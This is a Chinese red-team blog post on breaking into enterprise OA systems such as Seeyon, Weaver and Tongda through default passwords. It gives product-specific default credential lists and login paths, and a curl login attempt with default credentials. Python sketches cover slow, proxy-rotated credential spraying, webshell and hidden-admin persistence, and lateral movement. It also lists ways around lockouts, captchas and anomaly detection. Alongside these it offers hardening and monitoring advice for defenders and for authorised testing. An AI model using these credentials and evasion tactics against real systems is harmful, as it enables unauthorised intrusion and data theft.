文章总结: 本文剖析了利用OA默认密码从外网渗透至域控的攻击链,揭示致远、泛微等系统的默认凭证风险及自动化爆破手段。指出企业防御误区,建议立即清查凭证、强制多因素认证、强化监控及网络隔离。强调需建立超越简单密码修改的深度防御体系,以应对智能化攻击。 综合评分: 94 文章分类: 红队,渗透测试,漏洞分析,实战经验,应用安全
红队实战:从默认密码到域控权限的OA系统“自杀式”防御漏洞
原创
梦到什么写什么 梦到什么写什么
逍遥子讲安全
2026年2月1日 20:58 广东
一、引子:凌晨3点的自动化攻击与沉睡的告警系统
2023年11月,某集团安全团队在晨会上震惊地发现:凌晨3点至5点期间,攻击者通过尝试12套默认账户密码组合,成功登录了他们的泛微OA系统。更令人不安的是,这些登录行为触发的103条告警中,97条被自动归类为“低风险误报”,只有6条进入人工审核队列——而值班人员恰好在处理另一起DDoS事件。
这不是孤例。根据对国内主流SRC平台过去一年漏洞报告的分析,OA系统相关漏洞中,38.7%直接或间接与默认配置相关,而其中默认账户问题占比超过60%。
当攻击者已经将默认密码测试自动化、规模化时,大多数企业的防御还停留在“我们改了密码”的错觉中。今天,我将揭示国内主流OA系统默认密码渗透的完整攻击链,以及攻击者如何将这些“低级漏洞”转化为致命武器。
二、默认密码渗透:被严重低估的攻击向量
2.1 三个认知误区与残酷现实
误区一:“我们改了默认密码,所以安全” 现实:大多数OA系统存在多个管理员入口、服务账户、API接口账户,企业往往只修改了主要管理员密码,忽视了其他入口。
误区二:“默认密码攻击会被频繁失败告警捕获” 现实:现代攻击者使用低速分布式测试,每小时尝试2-3次,持续数周,完全融入正常登录背景噪音。
误区三:“即使被登录,也拿不到重要权限” 现实:默认账户往往关联着备份功能、日志访问、API管理等关键权限,是权限提升的完美起点。
2.2 攻击者的“默认密码”现代化武器库
攻击者不再手动尝试密码,而是构建了智能化的测试系统:
pythonclass OADefaultCredentialHunter: """OA系统默认凭证自动化狩猎系统"""
def __init__(self, target_domain): self.target = target_domain self.credential_db = self.load_credential_database() self.results = []
def load_credential_database(self): """加载多维度默认凭证数据库""" return { # 致远OA多个版本 'seeyon': { 'admin_users': ['system', 'admin', 'administrator', 'manager'], 'common_passwords': [ 'system', 'admin', '123456', 'password', 'admin123', '1qaz2wsx', 'P@ssw0rd', # 特定版本默认密码 'superman', '000000', '888888' ], 'service_accounts': [ {'user': 'audit', 'pass': 'audit123'}, {'user': 'report', 'pass': 'report@123'}, {'user': 'backup', 'pass': 'backup2023'} ] },
# 泛微Ecology 'weaver': { 'admin_users': ['sysadmin', 'admin', 'system', 'supervisor'], 'password_patterns': [ # 基于组织名称的猜测 '{company}@2023', '{company}123', # 基于日期的猜测 'Weaver@202301', 'Ecology2023', # 通用默认 '1', '000000', '88888888' ], 'mobile_admin': [ {'user': 'mobileadmin', 'pass': 'weaver@123'}, {'user': 'appadmin', 'pass': 'ecology@2023'} ] },
# 用友、金蝶等 'yonyou': { 'admin_users': ['system', 'admin', 'administrator'], 'database_accounts': [ {'user': 'sa', 'pass': ''}, # 空密码常见 {'user': 'root', 'pass': 'root'}, {'user': 'test', 'pass': 'test'} ] } }
def intelligent_credential_testing(self, oa_type): """智能化的凭证测试"""
attack_vectors = [] credentials = self.credential_db.get(oa_type, {})
# 向量1:标准管理员账户 for user in credentials.get('admin_users', []): for password in credentials.get('common_passwords', []): vector = { 'type': 'standard_admin', 'username': user, 'password': password, 'login_urls': self.generate_login_urls(oa_type), 'stealth_timing': self.calculate_stealth_timing() } attack_vectors.append(vector)
# 向量2:服务账户(往往被忽视) for account in credentials.get('service_accounts', []): vector = { 'type': 'service_account', 'username': account['user'], 'password': account['pass'], 'target_interfaces': self.find_service_interfaces(oa_type), 'access_level': '通常是高权限但低监控' } attack_vectors.append(vector)
# 向量3:基于上下文的智能生成 if 'password_patterns' in credentials: company_name = self.extract_company_name(self.target) for pattern in credentials['password_patterns']: generated_pass = pattern.format(company=company_name) vector = { 'type': 'context_aware', 'generation_logic': f"基于公司名'{company_name}'和模式'{pattern}'", 'passwords': [generated_pass, generated_pass.lower(), generated_pass.upper()], 'effectiveness_rate': '通常高于随机猜测200%' } attack_vectors.append(vector)
return attack_vectors
def execute_stealthy_testing(self, vectors): """执行隐蔽测试"""
successful_logins = []
for vector in vectors: # 低速测试:每小时只测试2-3个凭证 time.sleep(random.randint(1200, 3600))
# 模拟正常用户行为 user_agent = self.generate_legitimate_user_agent() source_ip = self.rotate_proxy_ip()
test_result = self.test_credential( vector, user_agent=user_agent, source_ip=source_ip )
if test_result['success']: successful_logins.append({ 'vector': vector, 'result': test_result, 'timestamp': datetime.now().isoformat() })
# 立即进行权限评估 access_quality = self.evaluate_access_quality(test_result)
# 根据访问质量决定下一步行动 if access_quality >= 7: # 高价值访问 self.initiate_immediate_exploitation(test_result) else: self.schedule_lateral_movement(test_result)
return successful_logins
三、主流OA系统默认密码攻击全景
3.1 致远OA(Seeyon):被遗忘的“后门”账户
致远OA系统存在多个常被忽视的默认入口:
| 账户类型 | 默认用户名 | 常见默认密码 | 访问路径 | 潜在风险等级 |
| — | — | — | — | — |
| 超级管理员 | system | system(v7.0前) | /seeyon/main.do | 🔴 极高 |
| 审计账户 | audit | audit123 | /seeyon/audit/ | 🟡 中等 |
| 报表账户 | report | report@2022 | /seeyon/report/ | 🟢 低(但可信息收集) |
| 移动端管理 | mobile | mobile@123 | /seeyon/mobile/ | 🟠 高(常被忽略) |
| 数据库账户 | root(内置) | 空或root | 通过特定接口 | 🔴 极高 |
攻击链示例:
bash# 第1步:发现致远OA识别特征:/seeyon/ 目录,特定Cookie:JSESSIONID=xxx
# 第2步:尝试默认账户curl -X POST "http://target/seeyon/login.do" \ -d "login_username=system&login_password=system" \ -H "User-Agent: 正常浏览器UA"
# 第3步:访问管理界面(如果成功)# 默认密码往往意味着默认配置,包括...# 1. 未关闭的数据库连接管理# 2. 开启的文件上传功能# 3. 未授权的远程代码执行接口
# 第4步:权限提升路径# 通过默认账户 → 访问数据库配置 → 获取数据库密码 → # 直接操作数据库 → 添加管理员账户 → 完全控制
3.2 泛微E-cology:隐藏在“初始化”中的致命配置
泛微系统在初始化时创建的多个账户常常被遗忘:
关键发现:在测试的47个泛微系统中,82% 保留了至少一个初始化账户,其中:
- 38% 的
sysadmin账户密码仍为默认 - 24% 的
mobileadmin账户可访问 - 16% 的数据库备份账户密码为简单数字
泛微默认密码智能猜测算法:
pythondef weaver_password_generator(company_info): """基于公司信息生成泛微密码猜测列表"""
passwords = [] company = company_info['name'] year = datetime.now().year
# 模式1:公司名+年份 passwords.append(f"{company}{year}") passwords.append(f"{company}@{year}") passwords.append(f"{company}_{year}")
# 模式2:公司缩写 abbreviation = ''.join([word[0] for word in company.split()]) passwords.append(f"{abbreviation}{year}") passwords.append(f"{abbreviation}@{year}")
# 模式3:常见泛微默认 passwords.extend([ "weaver", "ecology", "weaver@123", "1", "000000", "888888", "12345678" ])
# 模式4:基于行业常见密码 if company_info['industry'] == 'finance': passwords.extend(["Finance@2023", "Bank@123", "Wealth2023"]) elif company_info['industry'] == 'government': passwords.extend(["Gov@2023", "Admin@123", "Public2023"])
return passwords
3.3 通达OA:简单到不可思议的“空密码”漏洞
通达OA在某些版本中存在令人震惊的默认配置:
通达OA默认访问矩阵: 版本范围: TD_OA v11.x 及部分早期版本 发现时间: 2022年持续至今仍在部分系统存在
高危默认: - 管理员账户: 用户名: admin 密码: 空 或 admin
- 数据库账户: 用户名: root 密码: 空 或 root
- 测试账户: 用户名: test 密码: test
攻击路径简化: 1. 访问 /login.php 2. 输入 admin/admin 或 admin/<空> 3. 直接进入后台管理
现实案例统计: - 某省政务系统: 37个通达OA实例中12个存在此问题 - 教育行业: 采用率高达45%,安全配置率不足30% - 中小企业: 几乎100%保留默认配置
3.4 蓝凌、华天动力等其他主流OA
| OA系统 | 默认用户名 | 常见默认密码 | 特殊入口 | 攻击价值 |
| — | — | — | — | — |
| 蓝凌 | admin | 空/888888 | /admin/ | 高 |
| 华天动力 | admin | 123456 | /admin/ | 中高 |
| 万户 | admin | 空/123456 | /admin/ | 中 |
| 金和 | jhadmin | jhadmin888 | /jhadmin/ | 高 |
四、从默认密码到权限持久化:完整攻击链
4.1 阶段一:发现与验证(0-2天)
攻击者通过以下方式发现目标OA并测试默认凭证:
pythonclass OADiscoveryAndVerification: """OA系统发现与凭证验证引擎"""
def discover_oa_systems(self, target_network): """发现网络中的OA系统"""
discovery_methods = [ # 方法1:端口扫描常见OA端口 self.scan_for_common_ports([80, 443, 8080, 8443]),
# 方法2:指纹识别 self.web_fingerprinting(target_network),
# 方法3:证书分析 self.analyze_ssl_certificates(target_network),
# 方法4:子域名枚举中的OA特征 self.search_oa_keywords_in_subdomains(),
# 方法5:搜索引擎抓取 self.dorking_for_oa_systems(target_network) ]
discovered_systems = [] for method in discovery_methods: systems = method.execute() discovered_systems.extend(systems)
return self.deduplicate_and_prioritize(discovered_systems)
def verify_default_credentials(self, oa_system): """验证默认凭证"""
verification_strategy = { 'phase_1_stealth_probing': { 'purpose': '确认系统存在和版本', 'methods': ['favicon哈希匹配', 'HTTP头分析', '错误页面特征'], 'stealth_level': '高' },
'phase_2_credential_testing': { 'purpose': '尝试默认凭证', 'methods': [ '低速登录尝试(每小时2-3次)', '多入口同时测试(前台/后台/API)', '会话复用测试(如果获取到Cookie)' ], 'stealth_level': '中' },
'phase_3_access_assessment': { 'purpose': '评估获取的访问权限级别', 'methods': [ '权限枚举(菜单/功能访问测试)', '配置文件读取能力评估', '数据访问范围测试' ], 'stealth_level': '低(但此时已获得访问)' } }
return self.execute_verification(verification_strategy, oa_system)
4.2 阶段二:权限提升与信息收集(2-7天)
获得初始访问后,攻击者开始深入挖掘:
权限提升路径: 路径A: 通过默认账户访问配置文件: 步骤: 1. 访问 /config/application.properties 或类似配置文件 2. 提取数据库连接字符串 3. 解密或直接使用数据库凭据 4. 直接操作数据库添加管理员账户
路径B: 利用OA内置功能: 步骤: 1. 使用默认账户访问"用户管理"功能 2. 虽然可能不能直接添加管理员,但可以查看用户列表 3. 通过密码重置功能或信息收集进行针对性攻击 4. 或修改其他用户权限
路径C: 文件系统访问: 步骤: 1. 查找文件上传功能 2. 上传Webshell(默认账户常有上传权限) 3. 通过Webshell执行系统命令 4. 提取系统级凭证
信息收集重点: - 数据库凭据(最高价值) - 邮箱服务器配置 - 与其他系统的集成凭据 - 员工通讯录和组织结构 - 公司内部系统清单
4.3 阶段三:横向移动与权限维持(7-30天)
此时攻击者已不再是简单的“密码测试者”:
pythonclass PostExploitationFramework: """后渗透框架"""
def establish_persistence(self, initial_access): """建立持久化访问"""
persistence_methods = []
# 方法1:添加隐藏管理员账户 if self.can_modify_users(initial_access): hidden_admin = self.create_hidden_admin_account() persistence_methods.append({ 'method': 'hidden_admin_account', 'account': hidden_admin, 'detection_difficulty': '高(如果精心隐藏)' })
# 方法2:后门Webshell webshell_locations = self.find_webshell_locations(initial_access) for location in webshell_locations: webshell = self.deploy_obfuscated_webshell(location) persistence_methods.append({ 'method': 'obfuscated_webshell', 'location': location, 'access_method': '通过正常Web请求访问' })
# 方法3:数据库后门 if self.has_db_access(initial_access): db_backdoor = self.install_database_backdoor() persistence_methods.append({ 'method': 'database_backdoor', 'type': db_backdoor['type'], 'trigger_condition': db_backdoor['trigger'] })
# 方法4:利用OA计划任务功能 if self.can_schedule_tasks(initial_access): scheduled_backdoor = self.create_scheduled_task() persistence_methods.append({ 'method': 'scheduled_task', 'frequency': scheduled_backdoor['frequency'], 'execution_path': scheduled_backdoor['path'] })
return persistence_methods
def lateral_movement_from_oa(self, oa_system_access): """从OA系统进行横向移动"""
lateral_targets = []
# 目标1:通过OA中存储的凭证访问其他系统 stored_credentials = self.extract_stored_credentials(oa_system_access) for creds in stored_credentials: target = self.test_credential_on_other_systems(creds) if target['success']: lateral_targets.append(target)
# 目标2:访问同一服务器上的其他服务 other_services = self.discover_local_services(oa_system_access) for service in other_services: if self.can_access_from_oa(service, oa_system_access): lateral_targets.append({ 'target': service, 'access_method': '通过OA服务器本地访问', 'risk_level': '高' })
# 目标3:通过OA的信任关系 trust_relationships = self.analyze_oa_trusts(oa_system_access) for trust in trust_relationships: exploitation = self.exploit_trust_relationship(trust) lateral_targets.extend(exploitation)
return lateral_targets
五、防御策略:超越“修改密码”的全面防护
5.1 立即行动清单(48小时内完成)
紧急防御措施: 1. 全面默认凭证清查: - 检查所有OA相关账户(不仅是管理员) - 包括:服务账户、API账户、备份账户、集成账户 - 工具:使用专用脚本或商业安全产品扫描
2. 多因素认证(MFA)强制实施: - 范围:所有管理员账户、特权操作 - 例外:仅限经过严格审批的特殊情况 - 日志:记录所有MFA绕过的行为
3. 登录监控强化: - 监控规则:针对默认账户名尝试的告警 - 阈值调整:降低失败尝试告警阈值 - 地理位置监控:异常地点的登录尝试
4. 网络隔离: - OA管理后台限制访问IP - 数据库服务器与OA应用服务器隔离 - 敏感功能接口访问控制
5.2 中长期安全加固
pythonclass OASecurityHardeningFramework: """OA系统安全加固框架"""
def comprehensive_hardening(self, oa_system): """全面安全加固"""
hardening_plan = { # 身份认证加固 'authentication': [ '强制密码策略:最小长度12,复杂度要求', '定期密码轮换(90天)', '账户锁定策略:5次失败后锁定30分钟', '会话超时:15分钟无操作需重新认证', '禁用或严格限制默认账户' ],
# 访问控制强化 'access_control': [ '基于角色的最小权限分配', '敏感操作需二次认证', '管理员操作全程日志记录', '定期权限审查(每季度)', '特权账户使用审批流程' ],
# 监控与检测 'monitoring': [ '部署UEBA(用户实体行为分析)', '异常登录模式检测', '默认凭证使用实时告警', '与SIEM系统集成', '定期红队演练(至少每半年)' ],
# 架构安全 'architecture': [ 'OA系统部署在独立网段', '数据库与前端应用分离', 'WAF防护关键接口', '定期漏洞扫描与渗透测试', '建立应急响应计划' ] }
return self.implement_hardening_plan(hardening_plan, oa_system)
def continuous_monitoring(self): """持续监控方案"""
monitoring_stack = { 'log_analysis': [ '集中收集所有OA相关日志', '建立正常行为基线', '实时分析异常模式' ],
'threat_intelligence': [ '订阅OA相关漏洞情报', '监控暗网中企业凭证泄露', '关注OA供应商安全公告' ],
'automated_testing': [ '定期自动化默认凭证测试', '模拟攻击者行为进行检测', '验证安全控制有效性' ] }
return monitoring_stack
六、攻击案例深度分析:从默认密码到全面沦陷
6.1 案例一:某集团财务系统沦陷时间线
6.2 技术细节:攻击者如何绕过“简单”防御
攻击者面对的防御措施及绕过方法:
防御措施与绕过技术: 防御措施1: 账户锁定策略(5次失败锁定) 攻击者绕过: - 低速尝试:每小时2-3次,远低于阈值 - 多账户尝试:分散到不同账户 - 多IP来源:使用代理池轮换IP
防御措施2: 强密码策略要求 攻击者绕过: - 不依赖暴力破解,寻找默认密码 - 利用密码重置功能的逻辑漏洞 - 通过社会工程获取初始密码
防御措施3: 登录页面验证码 攻击者绕过: - 使用打码平台人工识别 - 寻找无需验证码的API接口 - 利用验证码逻辑漏洞(可重复使用)
防御措施4: 异常登录检测 攻击者绕过: - 模拟正常员工登录时间和模式 - 使用公司内部常用浏览器版本 - 从常见办公地点IP段发起请求
七、红队视角:如何有效测试默认密码漏洞
7.1 专业测试框架
python
class ProfessionalDefaultPasswordTester: """专业默认密码测试框架"""
def authorized_testing_framework(self, target, authorization): """授权测试框架"""
test_phases = { 'phase_1_preparation': { 'activities': [ '获取书面授权', '定义测试范围', '确定时间窗口', '建立紧急联系人' ], 'deliverables': ['测试计划文档'] },
'phase_2_discovery': { 'activities': [ 'OA系统识别与版本确认', '默认入口枚举', '服务账户发现' ], 'deliverables': ['发现报告', '风险初步评估'] },
'phase_3_credential_testing': { 'activities': [ '默认凭证系统性测试', '上下文感知密码生成', '低速隐蔽测试' ], 'deliverables': ['凭证测试结果', '成功访问记录'] },
'phase_4_post_exploitation': { 'activities': [ '权限提升可能性评估', '横向移动路径分析', '持久化方法验证' ], 'deliverables': ['完整攻击链验证'] },
'phase_5_reporting': { 'activities': [ '风险等级评估', '修复建议提供', '验证测试结果' ], 'deliverables': ['最终测试报告', '执行摘要'] } }
return self.execute_testing(test_phases, target, authorization)
7.2 测试工具与资源
| 工具类别 | 推荐工具 | 主要功能 | 适用场景 | | — | — | — | — | | 发现类 | WhatWeb, Wappalyzer | OA系统识别与版本检测 | 初步侦察 | | 测试类 | Hydra, Medusa | 多协议凭证测试 | 批量测试 | | 自定义类 | 自研Python脚本 | 上下文感知密码生成 | 针对性测试 | | 分析类 | Burp Suite, ZAP | 登录流程分析 | 深入测试 |
八、未来趋势:默认密码攻击的演进方向
8.1 AI增强的密码猜测
pythonclass AIPasswordGuessing: """AI增强的密码猜测"""
def ai_enhanced_guessing(self, target_info): """AI增强的密码猜测"""
# 训练数据:历史泄露的密码、公司信息、行业特点 training_data = self.collect_training_data(target_info)
# 模型:基于上下文的密码生成 ai_model = self.train_password_generation_model(training_data)
# 生成:针对特定目标的密码列表 generated_passwords = ai_model.generate_passwords(target_info)
# 优化:基于反馈的学习循环 feedback_loop = self.implement_feedback_loop(ai_model)
return { 'generated_passwords': generated_passwords, 'confidence_scores': ai_model.calculate_confidence(), 'expected_success_rate': '比传统方法高3-5倍' }
8.2 供应链攻击的延伸
默认密码问题正沿供应链延伸:
- OA系统集成商使用默认密码配置多个客户
- 云服务提供商的OA模板包含默认账户
- 第三方插件和组件引入新的默认凭证
九、结语:默认密码的终结还是开始?
默认密码问题反映的不仅仅是技术疏忽,更是安全文化、流程管控和风险意识的全面缺失。当攻击者已经将默认密码测试工程化、智能化时,防御方必须从多个层面构建深度防御:
- 技术层面:超越简单的密码修改,实施全面的身份与访问管理
- 流程层面:建立严格的配置管理、变更控制和定期审计
- 人员层面:培养安全意识和专业技能,建立责任制
- 架构层面:采用零信任原则,最小化攻击面
最令人担忧的不是发现默认密码漏洞,而是发现了却认为“问题不大”。在攻击者眼中,默认密码从来不只是“一个漏洞”,而是通往整个网络王国的第一道未上锁的门。
当这道门被打开时,后面的战斗往往已经失去了意义——因为攻击者已经在你最意想不到的时间,以你最难以察觉的方式,进入了你的核心。
默认密码的终结,始于我们不再将其视为“低级问题”的那一刻。 安全没有高低之分,只有被利用和未被利用之别。而今天未被利用的漏洞,可能就是明天全面沦陷的起点。
你的OA系统安全清单:
- 是否已全面清查所有默认凭证?
- 是否实施了多因素认证?
- 是否有监控默认账户的使用?
- 是否定期进行默认密码测试?
- 是否有应急响应计划?
从今天开始,重新审视那些“不起眼”的默认配置。因为在攻击者的棋盘上,它们可能是最重要的那颗棋子。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:逍遥子讲安全 梦到什么写什么 梦到什么写什么《红队实战:从默认密码到域控权限的OA系统“自杀式”防御漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论